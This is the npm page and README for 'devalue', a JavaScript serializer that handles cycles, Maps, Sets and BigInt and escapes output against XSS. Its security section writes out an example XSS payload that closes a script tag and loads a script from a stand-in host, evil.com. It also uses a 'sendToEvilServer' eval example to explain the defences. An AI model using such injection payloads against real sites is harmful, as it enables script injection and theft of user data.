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  • License MIT

Gets the job done when JSON.stringify can't

Package Exports

  • devalue

Readme

devalue

Like JSON.stringify, but handles

  • cyclical references (obj.self = obj)
  • repeated references ([value, value])
  • undefined, Infinity, NaN, -0
  • regular expressions
  • dates
  • Map and Set
  • BigInt

Try it out on runkit.com.

Goals:

Non-goals:

  • Human-readable output
  • Stringifying functions or non-POJOs

Usage

import { devalue } from 'devalue';

let obj = { a: 1, b: 2 };
obj.c = 3;

devalue(obj); // '{a:1,b:2,c:3}'

obj.self = obj;
devalue(obj); // '(function(a){a.a=1;a.b=2;a.c=3;a.self=a;return a}({}))'

Error handling

If devalue encounters a function or a non-POJO, it will throw an error. You can find where in the input data the offending value lives by inspecting error.path:

try {
  const map = new Map();
  map.set('key', function invalid() {});

  devalue({
    object: {
      array: [map]
    }
  })
} catch (e) {
  console.log(e.path); // '.object.array[0].get("key")'
}

XSS mitigation

Say you're server-rendering a page and want to serialize some state, which could include user input. JSON.stringify doesn't protect against XSS attacks:

const state = {
  userinput: `</script><script src='https://evil.com/mwahaha.js'>`
};

const template = `
<script>
  // NEVER DO THIS
  var preloaded = ${JSON.stringify(state)};
</script>`;

Which would result in this:

<script>
  // NEVER DO THIS
  var preloaded = {"userinput":"
</script>
<script src="https://evil.com/mwahaha.js">
  "};
</script>

Using devalue, we're protected against that attack:

const template = `
<script>
  var preloaded = ${devalue(state)};
</script>`;
<script>
  var preloaded = {
    userinput:
      "\\u003C\\u002Fscript\\u003E\\u003Cscript src='https:\\u002F\\u002Fevil.com\\u002Fmwahaha.js'\\u003E"
  };
</script>

This, along with the fact that devalue bails on functions and non-POJOs, stops attackers from executing arbitrary code. Strings generated by devalue can be safely deserialized with eval or new Function:

const value = (0, eval)('(' + str + ')');

Other security considerations

While devalue prevents the XSS vulnerability shown above, meaning you can use it to send data from server to client, you should not send user data from client to server using the same method. Since it has to be evaluated, an attacker that successfully submitted data that bypassed devalue would have access to your system.

When using eval, ensure that you call it indirectly so that the evaluated code doesn't have access to the surrounding scope:

{
  const sensitiveData = 'Setec Astronomy';
  eval('sendToEvilServer(sensitiveData)'); // pwned :(
  (0, eval)('sendToEvilServer(sensitiveData)'); // nice try, evildoer!
}

Using new Function(code) is akin to using indirect eval.

See also

License

MIT